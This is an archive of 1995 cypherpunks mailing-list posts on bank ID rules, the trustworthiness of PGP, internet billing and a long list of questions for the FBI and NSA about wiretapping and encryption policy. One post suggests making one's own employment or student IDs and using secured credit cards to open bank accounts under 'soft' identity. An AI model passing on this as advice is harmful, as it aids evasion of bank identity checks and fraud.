From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 1 Aug 95 13:46:57 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: US vs Overseas Banks
Message-ID: <199508012016.QAA15599@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:05 PM 7/30/95 -0400, Lucky Green wrote:

>Six years ago, you could walk into a Bank, show them your driver license,
>and open an  account.
>Today, you need several pieces of ID.
>Three years ago, you could withdraw money from your own account without
>having  your checkbook on you.
>Today, they make you pay for a "counter check".
>One year ago, you could walk into a bank an cash a check drawn onto an
>account at the very same bank.
>Today (Coast Federal), they make you pay a $10 check cashing fee.

This depends on location.  The Feds require that banks use the same ID to
open an account that they would require to cash a check.  The banks on the
Left and Right Coasts are fairly restrictive (more restrictive than they
have to be).  Banks in the Heartland (particularly the Intermountain West)
are much easier.

With a little work, it is still possible to open accounts with "soft" ID in
the more relaxed regions.  Since these banks are accessible by ATM and Fedex
and will soon be on the net (in some cases), they can be convenient to use.
Likewise Canadian banks (which routinely offer US$ accounts).  In the soft
ID category, I place Employment ID and Student ID which you are free to make
yourselves as well as the new secured credit cards; some of which can be
obtained in spite of one's lack of existence.  The latter make very good ID.

>The US banking industry has gone to the dogs. The day a non-US bank offers
>an account that can be accessed over the net will be the day I close my US
>accounts.

This will be the most interesting story of the next few years.  I will be
anxious to see if the new ease of "switching" money reverses the trend
toward decreased financial privacy caused by the war on money laundering.

DCF

"If Work, Jobs, Income, and the Middle Class Dream are all over, how come
more Americans and a higher proportion of Americans are now in paid
employment than ever before in our history."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marc Horowitz <marc@cam.ov.com>
Date: Tue, 1 Aug 95 13:36:30 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: What do I use?
In-Reply-To: <9508012013.AA14958@all.net>
Message-ID: <199508012037.QAA18078@dun-dun-noodles.cam.ov.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <9508012013.AA14958@all.net>, fc@all.net (Dr. Frederick B. Cohen) writes:

>> I never recommend a solution without knowing a fair amount about the
>> specific challenge it is supposed to address.  I typically start with
>> an understanding of the general environment, the financial and/or
>> human issues, the threat profile, the protection environment, the
>> other dependencies and protection factors, and other factors related
>> to the reasons for protection.  Once I have this understanding, I make
>> value judgements about how much I trust things relative to the
>> requirement for trust and other limitations presented by the
>> situation.

Ok.  IMHO, that's a perfectly valid position.  Under what
circumstances do you consider pgp to be a suitable tool?  Do you think
there is a better tool under similar circumstances?

		Marc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering <pgf@tyrell.net>
Date: Tue, 1 Aug 95 14:53:28 PDT
To: cypherpunks@toad.com
Subject: Provably Correct Crypto?
In-Reply-To: <9508011911.AA11465@all.net>
Message-ID: <199508012149.AA26006@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain



Hmm. Instead of "vetting" the PGP PRNG code, as Dr. Cohen has been
trying to tell me in private email is several programmer- years worth
of work perhaps I should just write my own version of the PRNG using
the algorithm as defined in whitepapernumberwhatever.

If there are artificial "bugs" to throw off the PRNG currently in the
PGP MIT code, they ought to simply not work right with the code I
write independently and therefore cause a crash or something.

Or perhaps just rewrite the program to use plain arrays instead of
pointers. ;-)

Phil





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering <pgf@tyrell.net>
Date: Tue, 1 Aug 95 14:58:06 PDT
To: fc@all.net
Subject: What do I use?
In-Reply-To: <9508012013.AA14958@all.net>
Message-ID: <199508012153.AA26490@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: fc@all.net (Dr. Frederick B. Cohen)
   Date: Tue, 1 Aug 1995 16:13:09 -0400 (EDT)
   X-Mailer: ELM [version 2.4 PL22]
   Content-Type: text
   Content-Length: 1941      
   Sender: owner-cypherpunks@toad.com
   Precedence: bulk

   > So Dr. Cohen, what do you use when you want to send a message across
   > the Internet with better security than cleartext?  What do your
   > recommend to others?

   I use different techniques when different levels of protection are
   required, and I definately don't use the Internet for anything that is
   really vital because of the ease of gaining intelligence indicators
   based on traffic analysis.

So you don't trust the remailers? Is this because you don't trust the
remailer implementations or because you don't trust digital mixes in
the first place?

   I never recommend a solution without knowing a fair amount about the
   specific challenge it is supposed to address.  I typically start with an
   understanding of the general environment, the financial and/or human
   issues, the threat profile, the protection environment, the other
   dependencies and protection factors, and other factors related to the
   reasons for protection.  Once I have this understanding, I make value
   judgements about how much I trust things relative to the requirement for
   trust and other limitations presented by the situation.

Actually, it sounds like you don't use anything that can be used by
someone not a professional old-time cryptographer.

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Tue, 1 Aug 95 14:03:18 PDT
To: marc@cam.ov.com (Marc Horowitz)
Subject: Re: What do I use?
In-Reply-To: <199508012037.QAA18078@dun-dun-noodles.cam.ov.com>
Message-ID: <9508012054.AA17294@all.net>
MIME-Version: 1.0
Content-Type: text


> >> I never recommend a solution without knowing a fair amount about the
> >> specific challenge it is supposed to address.  I typically start with
> >> an understanding of the general environment, the financial and/or
> >> human issues, the threat profile, the protection environment, the
> >> other dependencies and protection factors, and other factors related
> >> to the reasons for protection.  Once I have this understanding, I make
> >> value judgements about how much I trust things relative to the
> >> requirement for trust and other limitations presented by the
> >> situation.
> 
> Ok.  IMHO, that's a perfectly valid position.  Under what
> circumstances do you consider pgp to be a suitable tool?  Do you think
> there is a better tool under similar circumstances?

That's a tough one.  I generally follow the supreme court's view of not
handling hypotheticals, but I will give you some ideas about my view. 

I think that PGP is almost always suitable for casual conversation that
is to be kept from casual snooping.  Without specifically recommending
its use in any particular situation, I generally think that it is
suitable for select applications where:

	- The threat profile does not include well-funded professional
	cryptanalysts, police agencies, governments, serious financial
	rivals, criminals, or other high-grade threats. 

	- The implications of corruption, non-delivery, repudiation,
	or traffic analysis are not extremely important.

	- The implications of leakage isn't financially or otherwise
	catastrophic. 

	- No lives are at stake.

	- My reputation doesn't depend on it. 

I think that PGP is an excellent tool in many ways, however, I have
numerous difficulties with the lack of adequate interface to it in other
packages.  I am not really keen on its keyring concepts and other
similar things, but that's not a real issue in this frame of reference. 

I have serious concerns about the fact that use of this system does not
prohibit people who are not knowledgeable about the limitations of
public key cryptography from using it in ways that may result in the
revelation or weakening of private keys or other similar potential
problems.  For that reason, I would not advise the use of PGP for any
non-casual application outside of the context of a comprehensive
information protection program designed to provide assurance of its
proper generation, configuration, installation, application, and use.

There are almost certainly other concerns that I would express in an
evaluation for any particular purpose.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Tue, 1 Aug 95 14:20:33 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: Attacks on PGP
In-Reply-To: <ac42d74b05021004a9dd@[205.199.118.202]>
Message-ID: <199508012119.RAA23424@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> Things are heating up between Fred Cohen and some of the rest of the list.

Were it not for the fact that others are doing the job better than I,
I'd be compelled to enter into the fray myself...

> I've long appreciated Fred Cohen's work on viruses,

And frankly, I've long been forced to install filtering on virtually
every list "Dr." Cohen shows up on. He rarely has much of value to say
-- he also frequently gets kicked off of mailing lists for being a wee
bit to explicit in the advertising hype for his services he puts up on
virtually every mailing list he enters -- be it firewalls, bugtraq, or
whatever.

I considered, as I said, entering this fray early. Fortunately, "Dr."
Cohen has managed to demonstrate his capacity to alienate without my
having to warn anyone about it in advance.

This is not to say that I think PGP couldn't use enhances scrutiny, or
that all of "Dr." Cohen's comments are always completely meritless.
However, "Dr." Cohen rarely enhances the conversations he's a part of.

Perry

PS I'm sure he has a real PhD. Its just that the other couple dozen
PhDs on this mailing list don't seem to insist on rubbing it in
people's noses constantly -- ditto for all other mailing lists I've
seen him on.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM (David G. Koontz)
Date: Tue, 1 Aug 95 18:03:33 PDT
To: cypherpunks@toad.com
Subject: Billing for internet usage
Message-ID: <9508020106.AA16898@argosy.MasPar.COM>
MIME-Version: 1.0
Content-Type: text/plain



From time to time there is noise about billing for information transfer 
on the internet.  Historically, it cost more to do the billing calculations
then it was worth, yet you still hear about people wanting to figure out
how.

One way would be to perform cooperative billing balances between nodes,
and allow each node to 'bill upward'.   This means that any two machines
are more interested in their relative balance than how much money they
are really spending.   There are some interesting problems of trust and
reliability, that might be solved through the use of digital money.

Then there is the wiley programmer (or machine) that applies expert
solutions to the problem trying to 'route' around billing imbalances.

With sophisticated enough algorithms such machines would be basically
trading on billing futures, perhaps demonstrating that computers could
be better capitalists than people.

Imagine a communications network that collapses because of an economic
crash.

Would the internet require the equivalent of suspension of programmed
trading (routing) and a FTC?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Anderson <ericande@linknet.kitsap.lib.wa.us>
Date: Tue, 1 Aug 95 18:08:28 PDT
To: Phil Fraering <pgf@tyrell.net>
Subject: Re: There's a hole in your crypto, dear Eliza dear Eliza...
In-Reply-To: <199508010354.AA20144@tyrell.net>
Message-ID: <Pine.SUN.3.91.950801175557.15647B-100000@linknet.kitsap.lib.wa.us>
MIME-Version: 1.0
Content-Type: text/plain


How do I know PGP IS secure? I don't. That doesn't mean I don't use it or 
don't trust it. PGP was designed and written by a human, who by it's nature
is NOT infallable. The name says it all.... PRETTY GOOD; not REALLY GREAT 
or UNCRACKABLE, just pretty good. 
I think the simple fact that I am not in jail (Knock on wood....) attests 
to the fact that the algorythm, RNG, works Pretty Good. (There's them 
there words again) 
 
-----------------------------------------------------------------------------
JUSTICE: The outcome of NOT protecting people from the results of their 
own folly.
-----------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Tue, 1 Aug 95 18:34:35 PDT
To: cypherpunks
Subject: NRC Panel, Law Enforcement questions
Message-ID: <9508020134.AA07797@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


To: gnu, crypto@nas.edu (Herb Lin)
Date: Tue, 01 Aug 1995 18:07:59 -0700
From: John Gilmore <gnu@toad.com>

This is more organized.  Let me know if you want any more work done on it.

	John Gilmore
	for the Cypherpunks

POLITICAL PROCESS

It appears that law enforcement bureaucrats (such as Mr. Freeh) are
seizing on irrelevant publicity in order to push their agendas.  An
example is in using the Oklahoma bombing to lobby Congress for the
authority to limit the use of encryption (encryption played no part in
the Oklahoma bombing).  This makes the FBI/DoJ position look like it
can't actually support itself on the facts.  If the facts would
support you, why use irrelevant publicity INSTEAD of real facts?

Why does the FBI refuse to reveal its political manipulations on this issue
to the public?

Agent Kallstrom asked rhetorically at the Clipper debate held at the
New York City Bar Association if the audiance would want key escrow if
a daughter of theirs had been kidnapped to make a snuff pornographic
film.  Official Bureau records indicate that such films are at the
very least extremely rare and probably nonexistant. Why do Bureau
spokesmen use graphic description of non-existant crimes as a way of
whipping up public sentiment for key escrow?  Is it the opinion of the
bureau that Clipper would be of use in most kidnapping cases, given
that probable cause to issue a wiretap warrant would probably also be
sufficient to get a warrant to search the premises of the perpetrators
for the victim?  Does the Bureau feel that Agent Kallstrom's comment
was an appropriate way to conduct a reasoned discussion?

Give a precis of the top fifty violations of civil rights or the
political process by the FBI since 1950.  Rank them by magnitude of
the intrusion and by the number of people directly affected.  For
example, the FBI campaign against the Free Speech Movement's right to
speak and petition the government; the McCarthy era; the campaign
against CISPES; COINTELPRO; against civil rights organizations;
political assassination (e.g., Fred Hampton).

How did Mr. Hoover stay in power for his 40-year reign?  Be specific
about the threats that might have removed him from absolute leadership
of the FBI, and what steps he took to counteract these threats.

Detail all political figures, including everyone ever elected to
Congress, every President, every Cabinet-level officer, and every
judge at all levels, who have been subjected to wiretaps or any other
kind of covert surveillance by the FBI or any other agency in the
Executive Branch.  Estimate how many records of such surveillance have
been destroyed.

Detail all cases in which political figures were pressured,
threatened, blackmailed, or simply "informed" or "implied to" about
their covert surveillance.  What prompted these actions against
political figures, and what results did they have?

Why should we trust the FBI to "not listen in" when it has the
technical capability to do so, a history of having done so for reasons
inimical to democratic governance, and a bureacratic appetite for
power, money, and control?

What five things about your agency would the American public be most
surprised to learn?  Most pleased?  Most displeased?  What five things
about your agency would Congress be most surprised to learn?  The
President?

Do the domestic LEAs (law enforcement agencies), or their agents,
monitor the various crypto/net security and TLA forums on the Net?  If
so, which and by what legal authority?

Do LEAs, or their agents, log the names of posters to the crypto/net
security and TLA forums?  If so, by what legal authority?

Do LEAs, or their agents, monitor non-governmental crypto/net security
wizards?  If so, who and by what legal authority?

Do LEAs use crypto/net security industry informers?  Names?

Do LEAs run stings in crypto/net security, among crypto/net security
zines, orgs, corps, manufacturers?  Targets, names, dates, locations?

Do LEAs have confidential crypto/net security-access agreements with
software and hardware corps.  Names?

Do LEAs run agents-provocateurs in crypto/net security?  Names,
locations?

Do LEAs, or their agents, sniff the Net for crypto -- periodically,
continually?  How, where, who?

Do LEAs, or their agents, sniff remailers?  Which?

Do LEAs, or their agents, run remailers?  Which?

Does Federal policy allow law enforcement agents to purport to run an 
anonymous remailer, e.g. as part of a sting operation?


LAW ENFORCEMENT POLICY

As the FBI sees it, describe the proper place and powers of a national
law enforcement organization in an open society, without regard to
today's laws, court decisions, or the Constitution.  If we were
forming a new country, and could make it up as we went along, what
national law enforcment structure and powers would contribute the most
to our society?

Rank in order of priority, according to agency policy:
	--  National security
	--  Threats to a specific group or individual
	--  Constitutional rights of citizens
	--  Statutory rights of citizens
	--  Statutory limits on the activities of agencies
	--  Constitutional limits on the powers of government
	--  Democratic oversight and accountability
	--  Budgetary considerations
	--  Maintaining secrecy
	--  Prosecution of a criminal
	--  Preventing a crime
	--  Prosecuting or impeding a criminal organization
	--  Exposure of corruption within government
	--  Exposure of corruption within private industry
	--  ... ?
In what order would your agency sacrifice each of these to pursue or
preserve another?  Give examples from actual cases wherever possible.

Does the FBI five-year FOIA backlog render it a secret national police
organization?  How can a law enforcement organization be answerable to
its citizens if they cannot determine what it is doing until five years
later?

How does a law enforcement organization such as the FBI justify
breaking the law itself, by systematically withholding non-exempt
documents requested by citizens under the FOIA?

What effect have anti-drug efforts over the last 30 years had upon the
traditional roles of intelligence and law enforcement?

To what extent is drug trafficking considered of interest to intelligence
organizations?  Why?  Be specific.

Wiretaps can be used by the police to obtain both evidence and
intelligence.  By "evidence" I'm referring to information which can be
presented in a courtroom.  By "intelligence" I mean information which
is not presented in the courtroom, but which might be helpful to law
enforcement in other ways.  As citizens, our main protection against
illegal wiretaps is our ability to have improperly acquired evidence
thrown out of court.  What protection do we have from other illegal
wiretaps -- surveillance designed to gather intelligence, not
evidence?  Who oversees the police and the FBI to make sure that they
follow the rules?  How do we know that law enforcement people don't
use illegal wiretaps to go "fishing"?

What is the relationship between the FBI's campaign to limit or
eliminate the exclusionary rule and its campaign to increase its
technical capabilities for wiretapping?  It seems that the combination
of these initiatives would result in the FBI being able to perform and
`get away with' massive intrusions into personal privacy, for
illegitimate reasons, even if they were later judged to be in
violation of law or the constitution.

What is the FBI's opinion on the optimal level (from their point of
view) of wiretapping/surveilance if money were no object?  How many
wiretaps would the Bureau execute per year if it could do exactly
as it desired, without budgetary or court-imposed restraints?

What trends does the government foresee in the expected cost of
wiretaps in the future? 

Does the DoJ expect that the number of wiretaps and electronic
surveillances will go up if the cost (currently high) goes down?

What do the FBI and its ilk know about using tracking technologies
such as video cameras, road pricing sensors, and other alternatives to
conventional electronic surveillance?

What do the FBI and its ilk know about the use of mechanical aids to
wiretaps (such as voice recognition technology for keywords;
voiceprint recoginition to ID wanted suspects)?

Has your agency ever exchanged intelligence with governments of other
countries?  Specify.

Has your agency ever exchanged technology with governments of other
countries?  Specify.

Has your agency ever given non-public technology to a private corporation?
Specify.  How are the beneficiaries of such gifts selected?

How frequently has your agency provided non-public information to
private organizations (such as corporations)?  How frequently have you
refused to do so?  Who, when, where and why?  Does your agency expect
to serve private clients in the foreseeable future, either directly or
indirectly?  How is policy formed on this issue?  How are
beneficiaries selected?

The burgeoning of privatization of domestic "intelligence"-gathering
has blossomed as LEAs activities have been diminished and as foreign
targets for TLAs have been reduced.  As the need for their services
have dropped, ex-TLA-employees have moved to security, investigative
and "anti-terrorist" firms and public service organizations.  Knoll
Associates, Wackenhut, Kissinger Associates, say, or the welter of
organizations and firms in the tri-coastal, Great Lakes and DC-beltway
regions, often benefit from continuing close contact with former
colleagues who remain active in TLAs.  TLAs could easily pass
prohibited current intelligence to the domestic private market,
paralleling their use of front organizations internationally.  Today,
information on militia groups is being provided by private
organizations, sometimes in the same forum as the officials who cannot
admit to surveilling those targeted groups.  E.g. the Charlie Rose
Show from April, 1995, featuring James Fox (former NYC FBI SAIC).
Also, a NY Times piece on April 24, 1995 gives capsule descriptions of
several "right wing movement" sites and groups, and credits the
material to a mix of private and public organizations.  The
intelligence-gathering, tracking and surveilling of dissident groups,
of all persuasions, by private means -- for profit, for ideological or
for humanitarian reasons -- is a provocative, perhaps civil
liberties-threatening, development, a heritage of the national
security culture, wherein a large number of very able people and
techniques and knowledge and equipment and organization, seem to be
shifting inexorably to new markets of ready, frightened consumers.  As
your agency campaigns for more intrusive surveillance technology and
methods, what impact on society do you foresee as the people who know
these technologies and methods move into the private sector, where
there are fewer rules and easier ways to avoid being caught?


CIVIL RIGHTS

Does the FBI believe that citizens have the right to use whatever
encryption system(s) they desire to use?

Does the FBI believe that the FBI has the right to use whatever
encryption system(s) it desires to use?

Does the FBI believe that private citizens who have special needs or
duties to protect confidential or privileged information -- e.g.,
lawyers, doctors, psychologists, accountants, financial advisors,
bankers, security advisors -- have the right to use whatever
encryption system(s) they desire to use for their own legal, ethical,
or business reasons?

Does the FBI believe that ordinary private citizens who do not belong
to a privileged class have less of a right to use whatever encryption
system(s) they desire to use than do lawyers, doctors, accountants,
financial advisors, bankers, or security advisors?

Does the FBI believe that members of non-mainstream religious groups
or "cults" have the right to use whatever encryption system(s) they
desire to use in transmitting their religious or political beliefs?

Does the FBI believe that individuals who believe strongly in their
rights under the First and Second Amendments to the Constitution have
the right to use whatever encryption system(s) they desire to use?

If wiretap or surveillance is really illegal, then the info gleaned is
likely tainted.  The problem isn't that the rules don't prohibit agencies
from doing it.  The problem is that there isn't an effective mechanism
to detect cheating.  Suppose the FBI puts an illegal wiretap on
someone, and finds out that they're going to commit a crime.  When the
crime takes place, they're on the scene.  How did they know?  "An
anonymous tip", or simply that the officer happened to be there.  How
can you prove it was something different?  An illegal wiretap could be
used to get hints on where admissible evidence can be `independently'
gathered.  Or what if they don't find evidence of a crime, and they
leave the guy alone?  His privacy's been violated illegally.  I once
spoke with someone from INS who told me that random surveillance on
certain people is done.  He told me that there are lists of people who
get "dropped in on" from time to time, mostly people have had some
sort of drug problems with the police.  Other people might get on the
list by being friends with someone already on the list, with
"friendship" being determined by telco records.  So if you call
someone on the list often, you might end up there yourself.  How
should we protect society against LEA `cheating' in a
clipper/digital-telephony world?

I worked for several years lobbying at INS and DOJ on business
immigration issues, and INS is hardly the bastion of proper police
procedures... Not to mention the fact that aliens have fewer rights
than citizens of the US. INS gets away with a lot of illegal stuff
because on the whole the alien won't litigate the circumstances of
their being caught, because they're too busy fighting the deportation
itself... that is if they even bother to hire an atty.  Aliens in
exclusion proceedings don't even have the right to counsel and in both
exclusion and deportation the burden of proof lies not with the
prosecution, but the defense (guilty until proven innocent).  For
example, the first thing an alien gets in the deportation process is
the OSC, the Order to Show Cause why they shouldn't be
deported...which presumes that they're deportable.  INS gets away with
a lot of crap because there are several legal limbo zones at play.
How can we protect aliens and suspected aliens' civil rights if law
enforcement agencies are given broader powers to make illegal
searches?

In drug cases there is massive and flagrant fabrication of informants.
Judges have been winking at this for some time.  If they need an
"informant" they will pull some petty crook out of stir, and tell him
if he reads his lines right, they will let him go.  Sometimes the same
"informant" turns up in case after case, even though the cases have no
connection with each other.  Are these fabricated informants to cover
up illegal wiretaps?  Or is it 100% fabrication, such as cases where
someone is merely suspected rather than known (on the basis of
illegally obtained evidence) to have committed a crime?  How can this
be avoided if we give increased wiretapping powers?

The ACLU won a court case which forced the LAPD to stop political
surveillance of civilians.  This surveillance had been going on for
decades, it simply came out in the 80s.  The book "The Squad," by
Michael Milan, 1989 covers it.  Much of the material has also been
covered by Dave Emory in his radio broadcasts.  There's also a book
called something like "LA Secret Police" or "Los Angeles Secret
Police".  A newspaper article stated that, just before they were
required to destroy the files, the LAPD intelligence unit had given
copies of all the files to an ex-cop who now ran a private right wing
intelligence clearing house.  He put them all in a database and made
them available to other groups like the B'nai Brith.  That cop was
hunted down, and either was extradited or self-surrendered for trial.
The San Francisco Chronicle covered it pretty well.  This was "Western
Goals."  The Association of Chiefs of Police moved *its* files
offshore a few years back to avoid U.S. laws about such police data
bases.  If LEAs are given more power to invisibly search citizens,
legally or illegally, how would you prevent the information obtained
by ILLEGAL searches from being retained or passed into private hands?

Is caller ID blocking (*67) effective when calling the police?  Or can
the police determine the calling phone, location, or identity anyway?

On the other hand, in some states police have lobbied for the power to
provide fake Caller-ID on calls _from_ the PD.  They claimed it was
necessary to handle undercover investigations.  Why should police agencies
be given the power of anonymity when ordinary citizens cannot be trusted
with it?


MOTIVATION FOR ENCRYPTION CONTROL

Why does the FBI *really* want to control encryption?  It clearly has
nothing to do with terrorism.  The palpable fear among the citizens is
that it has a lot to do with social control, enforcement of narrow
morality, decreased civil rights, increased federal agency authority
and budget, and authoritarianism.

Why is the FBI so upset about encryption?  What real-world events have 
caused this upset?  Or is it a case of "we think it's coming so we are
starting the political machinations now"?

HISTORY - WIRETAPS AND ENCRYPTION

If a legal wiretap encounters encrypted communications, detail what
steps are taken to try to decrypt the communications.

Provide the details of all wiretap orders in which encryption was
encountered.  In which of them was encryption a problem for law
enforcement?  In what percentage of wiretap orders is encryption
encountered at all?

Detail all court cases in which encryption has made it harder to get a 
conviction (or in which the accused was not convicted).  What percentage
of total court cases do these represent?

Detail all investigations in which encryption has made it harder to file
charges (or in which charges were never filed).  What percentage of total
investigations do these represent?

Detail all illegal wiretaps known to your agency.  [This question
should be asked of the telephone companies, too -- right at the
company-president level.  Recall the way in which telegrams were
handed over to the NSA for *years* on the orders of the heads of the
telegraph companies...]

Summarize all wiretaps under the Foreign Intelligence Surveillance Act.
How many, in what years, against what targets?  How many are fixed
permanent wiretaps (e.g. on the lines into an embassy), and how many
are temporary (e.g. against a suspected undercover foreign agent's 
residence or office)?  How many US citizens have been wiretapped
under FISA, for what length of time, and for what reasons?

I heard a rumor that the FISA court actually turned down a wiretap
request.  Provide full details.

Detail all wiretaps known to your agency which were authorized by
means OTHER THAN the FISA and which do not appear in the annually
reported wiretap statistics.  I.e.  who else has authorized the
placement of wiretaps, and for what purpose?

Are the alleged crimes for which encryption poses a law-enforcement
challenge victimless crimes, in which all parties to the alleged crime
were happy with the situation before the Law stepped in?  To what
extent does encryption pose a problem in settling real controversies
as opposed to government-mandated moral codes?

Has the FBI ever done a wiretap that encountered a Clipper chip?
Give details of what happened, if so.

Provide the details of all wiretap orders in which encryption was used 
but law enforcement was able to do its work anyway.

Detail all investigations in which encryption was used but charges were
filed anyway.

Detail all court cases in which encryption was used but the accused
_was_ convicted, or in which conviction failed for reasons other than
encryption.

During the Digital Telephony bill debate, the Administration stated or
alluded that one reason the FBI needs total control of wiretapping is
the unreliability of telephone company personnel.  (I.e. -- "if we tap
Jimmy Big-Tuna Vinchenzo at the CO, his spies will tip him off..").
Provide specifics on exactly how many legal taps have been "blown" by
actions of telephone company employees.  Cite specifics on these
cases.  Name telephone company folks charged with obstruction of
justice in these cases.  {Talk is cheap; but to charge someone, they
need SOME hard facts...}

How many subpoenas for telephone billing records are made by Federal
law enforcement agencies each month?  Under what circumstances do LEAs
order the production of this information?  Give statistics on the
motivations for why these private records are being produced, e.g.
"50% fishing expedition, 22% the subject is in custody for a crime
(break down by which crimes), 5% the subject is suspected of a crime
(break down), 10% the subject is not suspected of a crime but there
may be evidence of someone else's crime in their phone records".

Describe other tools & technologies available to criminal
organizations that pose LE problems of similar magnitude to the
perceived problems with cryptography.  Describe how the FBI plans to
control & restrict those tools & technologies.

Describe tools & technologies available to criminal organizations that
do not pose significant LE problems.

FBI/NSA INTERACTIONS

Detail all interactions between the FBI and the NSA, two organizations
that in the ordinary course of business would have very litle to say to
each other.

In what ways have the FBI and NSA attempted to manipulate public
policy to increase their joint power?

Detail in what ways have the FBI and NSA cooperated in doing the
actual work of either agency (FBI: apprehending and prosecuting
criminals; NSA: intercepting foreign communications of diplomatic and
military interest)?

Detail in what ways the FBI and NSA have cooperated, which have not
been directly related to the direct job of each agency (as specified
above)?

It has been documented (by Bamford and others) that through the early 1980s,
the NSA intercepted domestic long-distance telephone traffic by means of
simple dishes, mounted alongside legitimate telephone-company microwave
receivers.  Now that most such long-distance links have been converted to
fiber-optics, is the NSA still able to intercept this traffic?  How?  

How is the NSA affected by the passage of the Digital Telephony bill?  Did
the NSA play any role in the progress of this bill?  Will the expected
modifications to the telephone system have any uses to the NSA?  How?

BUDGET

What's the five-year -- 1995-2000 -- budget for all
crypto/net security ops?

LAW ENFORCEMENT SOURCES AND MONITORING

What are your agency's sources of information?  Which of these are
considered the most important, and for what reasons and purposes?

What is the current type and extent of your agency's monitoring of the
Internet?  What is the type and extent of your agency's monitoring of
other public communications media (i.e. radio, newspapers, etc.), both
here and abroad?  What sorts of intelligence come from these channels?

How will your agency's methods be changed by the advent of the GII?

How might your agency's mission be changed by the advent of the GII?

If strong encryption comes into widespread use within the U.S., which
of your sources would be compromised?  How much?  If strong encryption
is banned or controlled within the U.S., what new information would
become available?  What communications would remain unmonitorable?
Why?  Speculate out to five or ten years.

Science Fiction author Vernor Vinge once wrote, "Sufficiently advanced
communication is indistinguishable from noise."  Is this true?  How and to
what extent can encrypted communications be reliably distinguished from
other types of information or noise, both today and in the future?

What are the special challenges involved in compromising a key-escrowed
encryption system?  Has the NSA or any other intelligence agency, in the
U.S. or abroad, ever gone up against a key-escrowed system, or a system which
presented similar challenges and vulnerabilities?  With what results?  If
you were ordered to crack a clipper-like system, how would you proceed?

GOVERNMENT'S OWN USE OF ENCRYPTION

Are your agency's internal communications encrypted?  Are your agency's
communications with other agencies of the U.S. Government?  Other
governments?  Are these communications susceptible to subpoena?  How?

Are any of the internal communications of the U.S. Government encrypted?
Which, and using what methods?  Does your agency have the ability to monitor
or decipher these communications?  Does anyone?  What information can your
agency access concerning members of the U.S.  Government?  How has this
information been used?  How is it protected?

INTELLIGENCE POLICY

What is the strategic, tactical, economic or competitive value of
intelligence?  How is this value quantified and assessed?  I have been
told that a battlefield commander may profitably expend up to 75% of
his resources on the acquisition of data about an enemy.  How much of
a corporation's resources, for example, would be well spent on the
acquisition of various sorts of intelligence about potential
competitors and/or customers?  How much of a political candidate's
resources would be well spent on acquiring data about opposing
candidates and other organizations?  In the coming "information age",
how much of our society's total economic activity might we expect to
become devoted to snooping in general?

What is your agency's assessment of the surveillance and
crypto-analytic capabilities available to large corporations, both
inside and outside the U.S.?  What level of intelligence-gathering and
analysis capabilities might a large company be reasonably expected to
be able to acquire if competitive pressures were to dictate a strong
effort in that direction?

What are the most powerful possible uses of intelligence, past,
present and future?  What sorts of research has your agency done, or
is it currently doing, concerning possible future uses for
intelligence information?  Does your agency employ any psychologists?
Sociologists?  For what purposes?

THE FINAL QUESTION

What questions *should* we have asked you to recommend a good crypto
policy for the country?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ethridge@Onramp.NET (Allen B. Ethridge)
Date: Tue, 1 Aug 95 16:50:29 PDT
To: cypherpunks@toad.com
Subject: Re: [NOISE] was Re: a hole in PGP
Message-ID: <v02130500ac4427b669b3@[199.1.11.196]>
MIME-Version: 1.0
Content-Type: text/plain


>...
>> Anyway, after reading the crap below I have been forced to comment.
>> For an individual that parades the title of Doctor (and the indication
>> of intelligence that title should imply) you seem to lack the grasp of what
>> has been stated over and over again. If you can't study the source code,
>> find somone that you trust that can! Prove it *doesn't* work before you
>> knock it.
>
>So you claim that software is secure unless it has been shown to be
>insecure, while I claim it is insecure unless it has been shown to be
>secure.  Which position do you think more sensible? (rhetorical
>question, does not require any responses).

I suspect the practical point of view is more sensible, but if that's
what you meant i doubt that you would have called your question
rhetorical.

        allen






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Tue, 1 Aug 95 16:55:17 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: US vs Overseas Banks
In-Reply-To: <199508012016.QAA15599@panix.com>
Message-ID: <Pine.ULT.3.91.950801185038.7953A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

It's interesting to note that where I am (Mankato, Minnesota) I was able 
to open a checking account with NO ID what so ever.  I just wrote down a 
name and address (which is a P.O. box, BTW) and the next wee I had a box 
of checks (free) and a ATM card (also free).

Of course, this bank has been criticized for being somewhat lax on who 
they give accounts to, but the point still stands.  I could have been 
anybody, and give any false address.  *shrug*

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMB6iqTokqlyVGmCFAQES5QP+JWvxHeerHVH7SDoLjJ7bvl3cj4bjXfx9
